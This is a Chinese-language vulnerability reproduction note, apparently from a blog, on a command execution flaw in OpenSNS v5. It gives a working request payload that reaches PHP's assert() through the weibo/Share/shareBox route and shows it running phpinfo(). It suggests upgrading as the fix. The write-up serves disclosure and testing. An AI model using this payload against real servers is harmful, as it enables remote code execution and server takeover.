漏洞描述:
OpenSNS是想天科技开发的一款综合性社交软件。用户可以使用OpenSNS快速搭建一个类似于新浪微博一样的功能强大的社交网站。用户的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用。除此之外,OpenSNS还提供云市场进行功能扩展。
OpenSNS v5存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
复现过程:
1.访问http://ip:port,出现如下页面,开始实验

2.构造payload,访问phpinfo
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()

通过phpinfo可以获取到PHP 的编译选项及扩充配置、PHP 版本、服务器信息及环境变量、PHP 环境变量、操作系统版本信息、路径及环境变量配置、HTTP 标头、及版权宣告等信息,更加方便攻击者对网站进行渗透。
修复建议:
1.升级版本。


OpenSNSv5版本存在命令执行漏洞,攻击者可通过构造特定payload获取服务器控制权限。漏洞复现方法涉及phpinfo函数调用,建议升级至最新版本以修复此问题。

237

被折叠的 条评论
为什么被折叠?



